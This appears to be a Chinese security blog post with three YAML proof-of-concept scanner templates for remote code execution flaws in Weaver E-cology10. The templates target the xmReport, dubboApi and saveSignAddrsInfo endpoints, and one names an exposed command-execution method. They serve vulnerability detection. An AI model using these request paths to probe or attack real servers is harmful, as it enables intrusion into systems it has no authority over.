文章

泛微E-cology10 xmReport、dubboApi、saveSignAddrsInfo 远程代码执行漏洞 Poc

发表于
作者 Tajang
1 分钟阅读
泛微E-cology10 xmReport、dubboApi、saveSignAddrsInfo 远程代码执行漏洞 Poc

泛微 E-cology10 xmReport远程代码执行漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

name: poc-yaml-weaver-ecology10-archive-rce
transport: http

rules:

  r0:
    request:
      method: GET
      path: /papi/archive/aux/xmReport/preview
    expression: |-
      response.status == 405 && response.body_string.contains('"error":"Method Not Allowed"')
      && response.body_string.contains('"path":"/papi/archive/aux/xmReport/preview"')

  r1:
    request:
      method: POST
      path: /papi/archive/aux/xmReport/preview
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: ""
    expression: |-
      response.status == 200 && response.body_string.contains('"code":500')
      && response.body_string.contains('"msg":"系统错误"')
      && response.body_string.contains('"status":false')
      && response.body_string.contains('"fail":true')


expression: r0() && r1()

泛微 E-cology10 dubboApi远程代码执行漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

name: poc-yaml-weaver-ecology10-dubbo-debug-rce
transport: http

rules:
  r1:
    request:
      method: POST
      path: /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=com.weaver.dw.platform.spark.util.LinuxCommand&methodName=execCmdWaitStdOut
      headers:
        Content-Type: application/json
      body: '[]'
    expression: >
      response.status == 200 && response.body_string.contains('"code":500')
      && response.body_string.contains('"msg":"系统错误"')
      && response.body_string.contains('"status":false')
      && response.body_string.contains('"fail":true')
expression: r1()

泛微 E-cology10 saveSignAddrsInfo远程代码执行漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

name: poc-yaml-weaver-ecology10-hessian-rce

transport: http

set:
  key: randomLowercase(12)

rules:

  r1:
    request:
      method: POST
      path: /papi/calendar/saveSignAddrsInfo
      headers:
        Content-Type: application/json; charset=utf-8
      body: >
        {}
    expression: response.status == 200 && response.body_string.contains('"data":"缺少参数或者参数错误"')

  r2:
    request:
      method: GET
      path: /papi/calendar/getSignAddrsInfo?key=r_
    expression: response.status == 200 && response.body_string.contains('"msg":"接口返回成功"') && response.body_string.contains('"status":true')

expression: r1() && r2()
漏洞挖掘
RCE
本文由作者按照 CC BY 4.0 进行授权